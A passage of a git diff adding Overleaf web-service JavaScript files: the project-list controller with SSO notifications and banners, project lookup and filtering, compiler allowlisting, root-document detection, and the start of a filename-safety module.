affiliation.email, + institutionId: affiliation.institution.id, + 
institutionName: affiliation.institution.name, + templateKey: 'notification_institution_sso_available', + }) + } + }) + } + + if (samlSession) { + // Notification institution SSO: After SSO Linked + if (samlSession.linked) { + notificationsInstitution.push({ + email: samlSession.institutionEmail, + institutionName: + samlSession.linked.universityName || + samlSession.linked.providerName, + templateKey: 'notification_institution_sso_linked', + }) + } + + // Notification group SSO: After SSO Linked + if (samlSession.linkedGroup) { + groupSsoSetupSuccess = true + } + + // Notification institution SSO: After SSO Linked or Logging in + // The requested email does not match primary email returned from + // the institution + if ( + samlSession.requestedEmail && + samlSession.emailNonCanonical && + !samlSession.error + ) { + notificationsInstitution.push({ + institutionEmail: samlSession.emailNonCanonical, + requestedEmail: samlSession.requestedEmail, + templateKey: 'notification_institution_sso_non_canonical', + }) + } + + // Notification institution SSO: Tried to register, but account already existed + // registerIntercept is set before the institution callback. + // institutionEmail is set after institution callback. + // Check for both in case SSO flow was abandoned + if ( + samlSession.registerIntercept && + samlSession.institutionEmail && + !samlSession.error + ) { + notificationsInstitution.push({ + email: samlSession.institutionEmail, + templateKey: 'notification_institution_sso_already_registered', + }) + } + + // Notification: When there is a session error + if (samlSession.error) { + notificationsInstitution.push({ + templateKey: 'notification_institution_sso_error', + error: samlSession.error, + }) + } + } + delete req.session.saml + } + + function fakeDelay() { + return new Promise(resolve => { + setTimeout(() => resolve(undefined), 0) + }) + } + + const prefetchedProjectsBlob = await Promise.race([ + projectsBlobPending, + fakeDelay(), + ]) + Metrics.inc('project-list-prefetch-projects', 1, { + status: prefetchedProjectsBlob ? 
'success' : 'too-slow', + }) + + // in v2 add notifications for matching university IPs + if (Settings.overleaf != null && req.ip !== user.lastLoginIp) { + try { + await NotificationsBuilder.promises + .ipMatcherAffiliation(user._id) + .create(req.ip) + } catch (err) { + logger.error( + { err }, + 'failed to create institutional IP match notification' + ) + } + } + + const hasPaidAffiliation = userAffiliations.some( + affiliation => affiliation.licence && affiliation.licence !== 'free' + ) + + const inactiveTutorials = TutorialHandler.getInactiveTutorials(user) + + const usGovBannerHooksResponse = await Modules.promises.hooks.fire( + 'getUSGovBanner', + userEmails, + hasPaidAffiliation, + inactiveTutorials + ) + + const usGovBanner = (usGovBannerHooksResponse && + usGovBannerHooksResponse[0]) || { + showUSGovBanner: false, + usGovBannerVariant: null, + } + + const { showUSGovBanner, usGovBannerVariant } = usGovBanner + + const showGroupsAndEnterpriseBanner = + Features.hasFeature('saas') && + !showUSGovBanner && + !userIsMemberOfGroupSubscription && + !hasPaidAffiliation + + const groupsAndEnterpriseBannerVariant = + showGroupsAndEnterpriseBanner && + _.sample(['on-premise', 'FOMO', 'FOMO', 'FOMO']) + + let showInrGeoBanner = false + let showBrlGeoBanner = false + let showLATAMBanner = false + let recommendedCurrency + + if ( + usersBestSubscription?.type === 'free' || + usersBestSubscription?.type === 'standalone-ai-add-on' + ) { + const { countryCode, currencyCode } = + await GeoIpLookup.promises.getCurrencyCode(req.ip) + + if (countryCode === 'IN') { + showInrGeoBanner = true + } + showBrlGeoBanner = countryCode === 'BR' + + showLATAMBanner = ['MX', 'CO', 'CL', 'PE'].includes(countryCode) + // LATAM Banner needs to know which currency to display + if (showLATAMBanner) { + recommendedCurrency = currencyCode + } + } + + let hasIndividualRecurlySubscription = false + + try { + const individualSubscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + + hasIndividualRecurlySubscription = + individualSubscription?.groupPlan === false && + individualSubscription?.recurlyStatus?.state !== 'canceled' && + individualSubscription?.recurlySubscription_id !== '' + } catch (error) { + logger.error({ err: error }, 'Failed to get individual subscription') + } + + // Get the user's assignment for the DS unified nav split test, which + // populates splitTestVariants with a value for the split test name and allows + // Pug to send it to the browser + await SplitTestHandler.promises.getAssignment( + req, + res, + 'sidebar-navigation-ui-update' + ) + + // Get the user's assignment for the papers notification banner split test, + // which populates splitTestVariants with a value for the split test name and + // allows Pug to send it to the browser + await SplitTestHandler.promises.getAssignment( + req, + res, + 'papers-notification-banner' + ) + + res.render('project/list-react', { + title: 'your_projects', + usersBestSubscription, + notifications, + notificationsInstitution, + user, + userAffiliations, + userEmails, + reconfirmedViaSAML, + allInReconfirmNotificationPeriods, + survey, + tags, + portalTemplates, + prefetchedProjectsBlob, + showGroupsAndEnterpriseBanner, + groupsAndEnterpriseBannerVariant, + showUSGovBanner, + usGovBannerVariant, + showLATAMBanner, + recommendedCurrency, + showInrGeoBanner, + showBrlGeoBanner, + projectDashboardReact: true, // used in navbar + groupSsoSetupSuccess, + groupSubscriptionsPendingEnrollment: + 
groupSubscriptionsPendingEnrollment.map(subscription => ({ + groupId: subscription._id, + groupName: subscription.teamName, + })), + hasIndividualRecurlySubscription, + userRestrictions: Array.from(req.userRestrictions || []), + }) +} + +/** + * Load user's projects with pagination, sorting and filters + * + * @param {GetProjectsRequest} req the request + * @param {GetProjectsResponse} res the response + * @returns {Promise<void>} + */ +async function getProjectsJson(req, res) { + const { filters, page, sort } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + const projectsPage = await _getProjects(userId, filters, sort, page) + res.json(projectsPage) +} + +/** + * @param {string} userId + * @param {Filters} filters + * @param {Sort} sort + * @param {Page} page + * @returns {Promise<{totalSize: number, projects: ProjectApi[]}>} + * @private + */ +async function _getProjects( + userId, + filters = {}, + sort = { by: 'lastUpdated', order: 'desc' }, + page = { size: 20 } +) { + const [ + /** @type {AllUsersProjects} **/ allProjects, + /** @type {Tag[]} **/ tags, + ] = await Promise.all([ + ProjectGetter.promises.findAllUsersProjects( + userId, + 'name lastUpdated lastUpdatedBy publicAccesLevel archived trashed owner_ref tokens' + ), + TagsHandler.promises.getAllTags(userId), + ]) + const formattedProjects = _formatProjects(allProjects, userId) + const filteredProjects = _applyFilters( + formattedProjects, + tags, + filters, + userId + ) + const pagedProjects = _sortAndPaginate(filteredProjects, sort, page) + + await _injectProjectUsers(pagedProjects) + + return { + totalSize: filteredProjects.length, + projects: pagedProjects, + } +} + +/** + * @param {AllUsersProjects} projects + * @param {string} userId + * @returns {Project[]} + * @private + */ +function _formatProjects(projects, userId) { + const { + owned, + review, + readAndWrite, + readOnly, + tokenReadAndWrite, + tokenReadOnly, + } = projects + + const formattedProjects = /** @type {Project[]} **/ [] + for (const project of owned) { + formattedProjects.push( + _formatProjectInfo(project, 'owner', Sources.OWNER, userId) + ) + } + // Invite-access + for (const project of readAndWrite) { + formattedProjects.push( + _formatProjectInfo(project, 'readWrite', Sources.INVITE, userId) + ) + } + for (const project of review) { + formattedProjects.push( + _formatProjectInfo(project, 'review', Sources.INVITE, userId) + ) + } + for (const project of readOnly) { + formattedProjects.push( + _formatProjectInfo(project, 'readOnly', Sources.INVITE, userId) + ) + } + // Token-access + // Only add these formattedProjects if they're not already present, this gives us cascading access + // from 'owner' => 'token-read-only' + for (const project of tokenReadAndWrite) { + if (!formattedProjects.some(p => p.id === project._id.toString())) { + formattedProjects.push( + _formatProjectInfo(project, 'readAndWrite', Sources.TOKEN, userId) + ) + } + } + for (const project of tokenReadOnly) { + if (!formattedProjects.some(p => p.id === project._id.toString())) { + formattedProjects.push( + _formatProjectInfo(project, 'readOnly', Sources.TOKEN, userId) + ) + } + } + + return formattedProjects +} + +/** + * @param {Project[]} projects + * @param {Tag[]} tags + * @param {Filters} filters + * @param {string} userId + * @returns {Project[]} + * @private + */ +function _applyFilters(projects, tags, filters, userId) { + if (!_hasActiveFilter(filters)) { + return projects + } + return projects.filter(project => _matchesFilters(project, tags, 
filters)) +} + +/** + * @param {Project[]} projects + * @param {Sort} sort + * @param {Page} page + * @returns {Project[]} + * @private + */ +function _sortAndPaginate(projects, sort, page) { + if ( + (sort.by && !['lastUpdated', 'title', 'owner'].includes(sort.by)) || + (sort.order && !['asc', 'desc'].includes(sort.order)) + ) { + throw new OError('Invalid sorting criteria', { sort }) + } + const sortedProjects = _.orderBy( + projects, + [sort.by || 'lastUpdated'], + [sort.order || 'desc'] + ) + // TODO handle pagination + return sortedProjects +} + +/** + * @param {MongoProject} project + * @param {string} accessLevel + * @param {'owner' | 'invite' | 'token'} source + * @param {string} userId + * @returns {object} + * @private + */ +function _formatProjectInfo(project, accessLevel, source, userId) { + const archived = ProjectHelper.isArchived(project, userId) + // If a project is simultaneously trashed and archived, we will consider it archived but not trashed. + const trashed = ProjectHelper.isTrashed(project, userId) && !archived + + const model = { + id: project._id.toString(), + name: project.name, + owner_ref: project.owner_ref, + lastUpdated: project.lastUpdated, + lastUpdatedBy: project.lastUpdatedBy, + accessLevel, + source, + archived, + trashed, + } + if (accessLevel === PrivilegeLevels.READ_ONLY && source === Sources.TOKEN) { + model.owner_ref = null + model.lastUpdatedBy = null + } + return model +} + +/** + * @param {Project[]} projects + * @returns {Promise<void>} + * @private + */ +async function _injectProjectUsers(projects) { + const userIds = new Set() + for (const project of projects) { + if (project.owner_ref != null) { + userIds.add(project.owner_ref.toString()) + } + if (project.lastUpdatedBy != null) { + userIds.add(project.lastUpdatedBy.toString()) + } + } + + const projection = { + first_name: 1, + last_name: 1, + email: 1, + } + const users = {} + for (const user of await UserGetter.promises.getUsers(userIds, projection)) { + const userId = user._id.toString() + users[userId] = { + id: userId, + email: user.email, + firstName: user.first_name, + lastName: user.last_name, + } + } + for (const project of projects) { + if (project.owner_ref != null) { + project.owner = users[project.owner_ref.toString()] + } + if (project.lastUpdatedBy != null) { + project.lastUpdatedBy = users[project.lastUpdatedBy.toString()] || null + } + + delete project.owner_ref + } +} + +/** + * @param {any} project + * @param {Tag[]} tags + * @param {Filters} filters + * @private + */ +function _matchesFilters(project, tags, filters) { + if (filters.ownedByUser && project.accessLevel !== 'owner') { + return false + } + if (filters.sharedWithUser && project.accessLevel === 'owner') { + return false + } + if (filters.archived && !project.archived) { + return false + } + if (filters.trashed && !project.trashed) { + return false + } + if ( + filters.tag && + !_.find( + tags, + tag => + filters.tag === tag.name && (tag.project_ids || []).includes(project.id) + ) + ) { + return false + } + if ( + filters.search?.length && + project.name.toLowerCase().indexOf(filters.search.toLowerCase()) === -1 + ) { + return false + } + return true +} + +/** + * @param {Filters} filters + * @returns {boolean} + * @private + */ +function _hasActiveFilter(filters) { + return ( + filters.ownedByUser || + filters.sharedWithUser || + filters.archived || + filters.trashed || + filters.tag === null || + filters.tag?.length || + filters.search?.length + ) +} + +export default { + projectListPage: 
expressify(projectListPage), + getProjectsJson: expressify(getProjectsJson), +} diff --git a/services/web/app/src/Features/Project/ProjectLocator.js b/services/web/app/src/Features/Project/ProjectLocator.js new file mode 100644 index 0000000..2feaa0c --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectLocator.js @@ -0,0 +1,351 @@ +const _ = require('lodash') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const async = require('async') +const ProjectGetter = require('./ProjectGetter') +const Errors = require('../Errors/Errors') +const { promisifyMultiResult } = require('@overleaf/promise-utils') +const { iterablePaths } = require('./IterablePath') + +/** + * @param project + * @param predicate + * @returns {{path: string, value: *}} + */ +function findDeep(project, predicate) { + function find(value, path) { + if (predicate(value)) { + return { value, path: path.join('.') } + } + if (typeof value === 'object' && value !== null) { + for (const [childKey, childVal] of Object.entries(value)) { + const found = find(childVal, [...path, childKey]) + if (found) { + return found + } + } + } + } + return find(project.rootFolder, ['rootFolder']) +} + +function findElement(options, _callback) { + // The search algorithm below potentially invokes the callback multiple + // times. + const callback = _.once(_callback) + + const { + project, + project_id: projectId, + element_id: elementId, + type, + } = options + const elementType = sanitizeTypeOfElement(type) + + let count = 0 + const endOfBranch = function () { + if (--count === 0) { + logger.warn( + `element ${elementId} could not be found for project ${ + projectId || project._id + }` + ) + callback(new Errors.NotFoundError('entity not found')) + } + } + + function search(searchFolder, path) { + count++ + const element = _.find( + searchFolder[elementType], + el => (el != null ? 
el._id : undefined) + '' === elementId + '' + ) // need to ToString both id's for robustness + if ( + element == null && + searchFolder.folders != null && + searchFolder.folders.length !== 0 + ) { + _.forEach(searchFolder.folders, (folder, index) => { + if (folder == null) { + return + } + const newPath = {} + for (const key of Object.keys(path)) { + const value = path[key] + newPath[key] = value + } // make a value copy of the string + newPath.fileSystem += `/${folder.name}` + newPath.mongo += `.folders.${index}` + search(folder, newPath) + }) + endOfBranch() + } else if (element != null) { + const elementPlaceInArray = getIndexOf( + searchFolder[elementType], + elementId + ) + path.fileSystem += `/${element.name}` + path.mongo += `.${elementType}.${elementPlaceInArray}` + callback(null, element, path, searchFolder) + } else if (element == null) { + endOfBranch() + } + } + + const path = { fileSystem: '', mongo: 'rootFolder.0' } + + const startSearch = project => { + if (elementId + '' === project.rootFolder[0]._id + '') { + callback(null, project.rootFolder[0], path, null) + } else { + search(project.rootFolder[0], path) + } + } + + if (project != null) { + startSearch(project) + } else { + ProjectGetter.getProject( + projectId, + { rootFolder: true, rootDoc_id: true }, + (err, project) => { + if (err != null) { + return callback(err) + } + if (project == null) { + return callback(new Errors.NotFoundError('project not found')) + } + startSearch(project) + } + ) + } +} + +function findRootDoc(opts, callback) { + const getRootDoc = project => { + if (project.rootDoc_id != null) { + findElement( + { project, element_id: project.rootDoc_id, type: 'docs' }, + (error, ...args) => { + if (error != null) { + if (error instanceof Errors.NotFoundError) { + return callback(null, null) + } else { + return callback(error) + } + } + callback(null, ...args) + } + ) + } else { + callback(null, null) + } + } + const { project, project_id: projectId } = opts + if (project != null) { + getRootDoc(project) + } else { + ProjectGetter.getProject( + projectId, + { rootFolder: true, rootDoc_id: true }, + (err, project) => { + if (err != null) { + logger.warn({ err }, 'error getting project') + callback(err) + } else { + getRootDoc(project) + } + } + ) + } +} + +function findElementByPath(options, callback) { + const { project, project_id: projectId, path, exactCaseMatch } = options + if (path == null) { + return new Error('no path provided for findElementByPath') + } + + if (project != null) { + _findElementByPathWithProject(project, path, exactCaseMatch, callback) + } else { + ProjectGetter.getProject( + projectId, + { rootFolder: true, rootDoc_id: true }, + (err, project) => { + if (err != null) { + return callback(err) + } + _findElementByPathWithProject(project, path, exactCaseMatch, callback) + } + ) + } +} + +function _findElementByPathWithProject( + project, + needlePath, + exactCaseMatch, + callback +) { + let matchFn + if (exactCaseMatch) { + matchFn = (a, b) => a === b + } else { + matchFn = (a, b) => + (a != null ? a.toLowerCase() : undefined) === + (b != null ? 
b.toLowerCase() : undefined) + } + + function getParentFolder(haystackFolder, foldersList, level, cb) { + if (foldersList.length === 0) { + return cb(null, haystackFolder) + } + const needleFolderName = foldersList[level] + let found = false + for (const folder of haystackFolder.folders) { + if (matchFn(folder.name, needleFolderName)) { + found = true + if (level === foldersList.length - 1) { + return cb(null, folder) + } else { + return getParentFolder(folder, foldersList, level + 1, cb) + } + } + } + if (!found) { + cb( + new Error( + `not found project: ${project._id} search path: ${needlePath}, folder ${foldersList[level]} could not be found` + ) + ) + } + } + + function getEntity(folder, entityName, cb) { + let result, type + if (entityName == null) { + return cb(null, folder, 'folder', null) + } + for (const file of iterablePaths(folder, 'fileRefs')) { + if (matchFn(file != null ? file.name : undefined, entityName)) { + result = file + type = 'file' + } + } + for (const doc of iterablePaths(folder, 'docs')) { + if (matchFn(doc != null ? doc.name : undefined, entityName)) { + result = doc + type = 'doc' + } + } + for (const childFolder of iterablePaths(folder, 'folders')) { + if ( + matchFn(childFolder != null ? childFolder.name : undefined, entityName) + ) { + result = childFolder + type = 'folder' + } + } + + if (result != null) { + cb(null, result, type, folder) + } else { + cb( + new Error( + `not found project: ${project._id} search path: ${needlePath}, entity ${entityName} could not be found` + ) + ) + } + } + + if (project == null) { + return callback(new Error('Tried to find an element for a null project')) + } + if (needlePath === '' || needlePath === '/') { + return callback(null, project.rootFolder[0], 'folder', null) + } + + if (needlePath.indexOf('/') === 0) { + needlePath = needlePath.substring(1) + } + const foldersList = needlePath.split('/') + const needleName = foldersList.pop() + const rootFolder = project.rootFolder[0] + + const jobs = [] + jobs.push(cb => getParentFolder(rootFolder, foldersList, 0, cb)) + jobs.push((folder, cb) => getEntity(folder, needleName, cb)) + async.waterfall(jobs, callback) +} + +function sanitizeTypeOfElement(elementType) { + const lastChar = elementType.slice(-1) + if (lastChar !== 's') { + elementType += 's' + } + if (elementType === 'files') { + elementType = 'fileRefs' + } + return elementType +} + +function getIndexOf(searchEntity, id) { + const { length } = searchEntity + let count = 0 + while (count < length) { + if ( + (searchEntity[count] != null ? searchEntity[count]._id : undefined) + + '' === + id + '' + ) { + return count + } + count++ + } +} + +/** + * Follow the given Mongo path (as returned by findElement) and return the + * entity at the end of it. + */ +function findElementByMongoPath(project, mongoPath) { + const components = mongoPath.split('.') + let node = project + for (const component of components) { + const key = Array.isArray(node) ? 
parseInt(component, 10) : component + node = node[key] + if (node == null) { + throw new OError('entity not found', { + projectId: project._id, + mongoPath, + }) + } + } + return node +} + +module.exports = { + findElement, + findElementByPath, + findRootDoc, + findElementByMongoPath, + findDeep, + promises: { + findElement: promisifyMultiResult(findElement, [ + 'element', + 'path', + 'folder', + ]), + findElementByPath: promisifyMultiResult(findElementByPath, [ + 'element', + 'type', + 'folder', + ]), + findRootDoc: promisifyMultiResult(findRootDoc, [ + 'element', + 'path', + 'folder', + ]), + }, +} diff --git a/services/web/app/src/Features/Project/ProjectOptionsHandler.js b/services/web/app/src/Features/Project/ProjectOptionsHandler.js new file mode 100644 index 0000000..5ca89ce --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectOptionsHandler.js @@ -0,0 +1,92 @@ +const { Project } = require('../../models/Project') +const settings = require('@overleaf/settings') +const { callbackify } = require('util') +const { db, ObjectId } = require('../../infrastructure/mongodb') +const safeCompilers = ['xelatex', 'pdflatex', 'latex', 'lualatex'] + +const ProjectOptionsHandler = { + async setCompiler(projectId, compiler) { + if (!compiler) { + return + } + compiler = compiler.toLowerCase() + if (!safeCompilers.includes(compiler)) { + throw new Error(`invalid compiler: ${compiler}`) + } + const conditions = { _id: projectId } + const update = { compiler } + return Project.updateOne(conditions, update, {}) + }, + + async setImageName(projectId, imageName) { + if (!imageName || !Array.isArray(settings.allowedImageNames)) { + return + } + imageName = imageName.toLowerCase() + const isAllowed = settings.allowedImageNames.find( + allowed => imageName === allowed.imageName + ) + if (!isAllowed) { + throw new Error(`invalid imageName: ${imageName}`) + } + const conditions = { _id: projectId } + const update = { imageName: settings.imageRoot + '/' + imageName } + return Project.updateOne(conditions, update, {}) + }, + + async setSpellCheckLanguage(projectId, languageCode) { + if (!Array.isArray(settings.languages)) { + return + } + const language = settings.languages.find( + language => language.code === languageCode + ) + if (languageCode && !language) { + throw new Error(`invalid languageCode: ${languageCode}`) + } + const conditions = { _id: projectId } + const update = { spellCheckLanguage: languageCode } + return Project.updateOne(conditions, update, {}) + }, + + async setBrandVariationId(projectId, brandVariationId) { + if (!brandVariationId) { + return + } + const conditions = { _id: projectId } + const update = { brandVariationId } + return Project.updateOne(conditions, update, {}) + }, + + async unsetBrandVariationId(projectId) { + const conditions = { _id: projectId } + const update = { $unset: { brandVariationId: 1 } } + return Project.updateOne(conditions, update, {}) + }, + + async setHistoryRangesSupport(projectId, enabled) { + const conditions = { _id: new ObjectId(projectId) } + const update = { + $set: { 'overleaf.history.rangesSupportEnabled': enabled }, + } + // NOTE: Updating the Mongoose model with the same query doesn't work. Maybe + // because rangesSupportEnabled is not part of the schema? 
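+    // If so, going through the raw driver collection avoids Mongoose's
+    // strict-mode filtering and applies the $set on the nested
+    // 'overleaf.history.rangesSupportEnabled' path as-is.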
+ return db.projects.updateOne(conditions, update) + }, +} + +module.exports = { + setCompiler: callbackify(ProjectOptionsHandler.setCompiler), + setImageName: callbackify(ProjectOptionsHandler.setImageName), + setSpellCheckLanguage: callbackify( + ProjectOptionsHandler.setSpellCheckLanguage + ), + setBrandVariationId: callbackify(ProjectOptionsHandler.setBrandVariationId), + unsetBrandVariationId: callbackify( + ProjectOptionsHandler.unsetBrandVariationId + ), + setHistoryRangesSupport: callbackify( + ProjectOptionsHandler.setHistoryRangesSupport + ), + promises: ProjectOptionsHandler, +} diff --git a/services/web/app/src/Features/Project/ProjectRootDocManager.js b/services/web/app/src/Features/Project/ProjectRootDocManager.js new file mode 100644 index 0000000..0bac5e3 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectRootDocManager.js @@ -0,0 +1,341 @@ +/* eslint-disable + n/handle-callback-err, + max-len, + no-unused-vars, + no-useless-escape, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ProjectRootDocManager +const ProjectEntityHandler = require('./ProjectEntityHandler') +const ProjectEntityUpdateHandler = require('./ProjectEntityUpdateHandler') +const ProjectGetter = require('./ProjectGetter') +const DocumentHelper = require('../Documents/DocumentHelper') +const Path = require('path') +const fs = require('fs') +const async = require('async') +const globby = require('globby') +const _ = require('lodash') +const { promisifyAll } = require('@overleaf/promise-utils') +const logger = require('@overleaf/logger') +const { + BackgroundTaskTracker, +} = require('../../infrastructure/GracefulShutdown') + +const rootDocResets = new BackgroundTaskTracker('root doc resets') + +module.exports = ProjectRootDocManager = { + setRootDocAutomaticallyInBackground(projectId) { + rootDocResets.add() + setTimeout(async () => { + try { + await ProjectRootDocManager.promises.setRootDocAutomatically(projectId) + } catch (err) { + logger.warn( + { err }, + 'failed to set root doc automatically in background' + ) + } finally { + rootDocResets.done() + } + }, 30 * 1000) + }, + + setRootDocAutomatically(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectEntityHandler.getAllDocs(projectId, function (error, docs) { + if (error != null) { + return callback(error) + } + + const jobs = _.map( + docs, + (doc, path) => + function (cb) { + if ( + ProjectEntityUpdateHandler.isPathValidForRootDoc(path) && + DocumentHelper.contentHasDocumentclass(doc.lines) + ) { + async.setImmediate(function () { + cb(doc._id) + }) + } else { + async.setImmediate(function () { + cb(null) + }) + } + } + ) + + return async.series(jobs, function (rootDocId) { + if (rootDocId != null) { + return ProjectEntityUpdateHandler.setRootDoc( + projectId, + rootDocId, + callback + ) + } else { + return callback() + } + }) + }) + }, + + findRootDocFileFromDirectory(directoryPath, callback) { + if (callback == null) { + callback = function () {} + } + const filePathsPromise = globby(['**/*.{tex,Rtex,Rnw}'], { + cwd: directoryPath, + followSymlinkedDirectories: false, + onlyFiles: true, + case: false, + }) + + // the search order is such that we prefer files closer to the project 
root, then + // we go by file size in ascending order, because people often have a main + // file that just includes a bunch of other files; then we go by name, in + // order to be deterministic + filePathsPromise.then( + unsortedFiles => + ProjectRootDocManager._sortFileList( + unsortedFiles, + directoryPath, + function (err, files) { + if (err != null) { + return callback(err) + } + let firstFileInRootFolder + let doc = null + + return async.until( + cb => cb(null, doc != null || files.length === 0), + function (cb) { + const file = files.shift() + return fs.readFile( + Path.join(directoryPath, file), + 'utf8', + function (error, content) { + if (error != null) { + return cb(error) + } + content = (content || '').replace(/\r/g, '') + if (DocumentHelper.contentHasDocumentclass(content)) { + doc = { path: file, content } + } + + if (!firstFileInRootFolder && !file.includes('/')) { + firstFileInRootFolder = { path: file, content } + } + cb(null) + } + ) + }, + err => { + if (err) { + return callback(err) + } + + // if no doc was found, use the first file in the root folder as the main doc + if (!doc && firstFileInRootFolder) { + doc = firstFileInRootFolder + } + + callback(null, doc?.path, doc?.content) + } + ) + } + ), + err => callback(err) + ) + + // coffeescript's implicit-return mechanism returns filePathsPromise from this method, which confuses mocha + return null + }, + + setRootDocFromName(projectId, rootDocName, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectEntityHandler.getAllDocPathsFromProjectById( + projectId, + function (error, docPaths) { + let docId, path + if (error != null) { + return callback(error) + } + // strip off leading and trailing quotes from rootDocName + rootDocName = rootDocName.replace(/^\'|\'$/g, '') + // prepend a slash for the root folder if not present + if (rootDocName[0] !== '/') { + rootDocName = `/${rootDocName}` + } + // find the root doc from the filename + let rootDocId = null + for (docId in docPaths) { + // docpaths have a leading / so allow matching "folder/filename" and "/folder/filename" + path = docPaths[docId] + if (path === rootDocName) { + rootDocId = docId + } + } + // try a basename match if there was no match + if (!rootDocId) { + for (docId in docPaths) { + path = docPaths[docId] + if (Path.basename(path) === Path.basename(rootDocName)) { + rootDocId = docId + } + } + } + // set the root doc id if we found a match + if (rootDocId != null) { + return ProjectEntityUpdateHandler.setRootDoc( + projectId, + rootDocId, + callback + ) + } else { + return callback() + } + } + ) + }, + + ensureRootDocumentIsSet(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return ProjectGetter.getProject( + projectId, + { rootDoc_id: 1 }, + function (error, project) { + if (error != null) { + return callback(error) + } + if (project == null) { + return callback(new Error('project not found')) + } + + if (project.rootDoc_id != null) { + return callback() + } else { + return ProjectRootDocManager.setRootDocAutomatically( + projectId, + callback + ) + } + } + ) + }, + + /** + * @param {ObjectId | string} project_id + * @param {Function} callback + */ + ensureRootDocumentIsValid(projectId, callback) { + ProjectGetter.getProjectWithoutDocLines( + projectId, + function (error, project) { + if (error != null) { + return callback(error) + } + if (project == null) { + return callback(new Error('project not found')) + } + + if (project.rootDoc_id != null) { + 
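+          // A root doc is already set; the lookup below verifies that it
+          // still resolves to a path in the project tree. If it does not
+          // (e.g. the doc was deleted), the root doc is unset and re-picked
+          // automatically.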
ProjectEntityHandler.getDocPathFromProjectByDocId( + project, + project.rootDoc_id, + (err, docPath) => { + if (docPath) return callback() + ProjectEntityUpdateHandler.unsetRootDoc(projectId, () => + ProjectRootDocManager.setRootDocAutomatically( + projectId, + callback + ) + ) + } + ) + } else { + return ProjectRootDocManager.setRootDocAutomatically( + projectId, + callback + ) + } + } + ) + }, + + _sortFileList(listToSort, rootDirectory, callback) { + if (callback == null) { + callback = function () {} + } + return async.mapLimit( + listToSort, + 5, + (filePath, cb) => + fs.stat(Path.join(rootDirectory, filePath), function (err, stat) { + if (err != null) { + return cb(err) + } + return cb(null, { + size: stat.size, + path: filePath, + elements: filePath.split(Path.sep).length, + name: Path.basename(filePath), + }) + }), + function (err, files) { + if (err != null) { + return callback(err) + } + + return callback( + null, + _.map( + files.sort(ProjectRootDocManager._rootDocSort), + file => file.path + ) + ) + } + ) + }, + + _rootDocSort(a, b) { + // sort first by folder depth + if (a.elements !== b.elements) { + return a.elements - b.elements + } + // ensure main.tex is at the start of each folder + if (a.name === 'main.tex' && b.name !== 'main.tex') { + return -1 + } + if (a.name !== 'main.tex' && b.name === 'main.tex') { + return 1 + } + // prefer smaller files + if (a.size !== b.size) { + return a.size - b.size + } + // otherwise, use the full path name + return a.path.localeCompare(b.path) + }, +} + +module.exports = ProjectRootDocManager +module.exports.promises = promisifyAll(module.exports, { + without: ['_rootDocSort', 'setRootDocAutomaticallyInBackground'], + multiResult: { + findRootDocFileFromDirectory: ['path', 'content'], + }, +}) diff --git a/services/web/app/src/Features/Project/ProjectUpdateHandler.js b/services/web/app/src/Features/Project/ProjectUpdateHandler.js new file mode 100644 index 0000000..ad9b914 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectUpdateHandler.js @@ -0,0 +1,47 @@ +const { Project } = require('../../models/Project') +const { callbackify } = require('util') + +const ProjectUpdateHandler = { + async markAsUpdated(projectId, lastUpdatedAt, lastUpdatedBy) { + if (!lastUpdatedAt) { + lastUpdatedAt = new Date() + } + + const conditions = { + _id: projectId, + lastUpdated: { $lt: lastUpdatedAt }, + } + + const update = { + lastUpdated: lastUpdatedAt || new Date().getTime(), + lastUpdatedBy, + } + await Project.updateOne(conditions, update, {}).exec() + }, + + async markAsOpened(projectId) { + const conditions = { _id: projectId } + const update = { lastOpened: Date.now() } + await Project.updateOne(conditions, update, {}).exec() + }, + + async markAsInactive(projectId) { + const conditions = { _id: projectId } + const update = { active: false } + await Project.updateOne(conditions, update, {}).exec() + }, + + async markAsActive(projectId) { + const conditions = { _id: projectId } + const update = { active: true } + await Project.updateOne(conditions, update, {}).exec() + }, +} + +module.exports = { + markAsUpdated: callbackify(ProjectUpdateHandler.markAsUpdated), + markAsOpened: callbackify(ProjectUpdateHandler.markAsOpened), + markAsInactive: callbackify(ProjectUpdateHandler.markAsInactive), + markAsActive: callbackify(ProjectUpdateHandler.markAsActive), + promises: ProjectUpdateHandler, +} diff --git a/services/web/app/src/Features/Project/SafePath.js b/services/web/app/src/Features/Project/SafePath.js new file mode 100644 index 
0000000..10267f7 --- /dev/null +++ b/services/web/app/src/Features/Project/SafePath.js @@ -0,0 +1,135 @@ +/* eslint-disable + max-len, + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// This file is shared between the frontend and server code of web, so that +// filename validation is the same in both implementations. +// The logic in all copies must be kept in sync: +// app/src/Features/Project/SafePath.js +// frontend/js/ide/directives/SafePath.js +// frontend/js/features/file-tree/util/safe-path.js + +const load = function () { + let SafePath + // eslint-disable-next-line prefer-regex-literals + const BADCHAR_RX = new RegExp( + `\ +[\ +\\/\ +\\\\\ +\\*\ +\\u0000-\\u001F\ +\\u007F\ +\\u0080-\\u009F\ +\\uD800-\\uDFFF\ +]\ +`, + 'g' + ) + + // eslint-disable-next-line prefer-regex-literals + const BADFILE_RX = new RegExp( + `\ +(^\\.$)\ +|(^\\.\\.$)\ +|(^\\s+)\ +|(\\s+$)\ +`, + 'g' + ) + + // Put a block on filenames which match javascript property names, as they + // can cause exceptions where the code puts filenames into a hash. This is a + // temporary workaround until the code in other places is made safe against + // property names. + // + // The list of property names is taken from + // 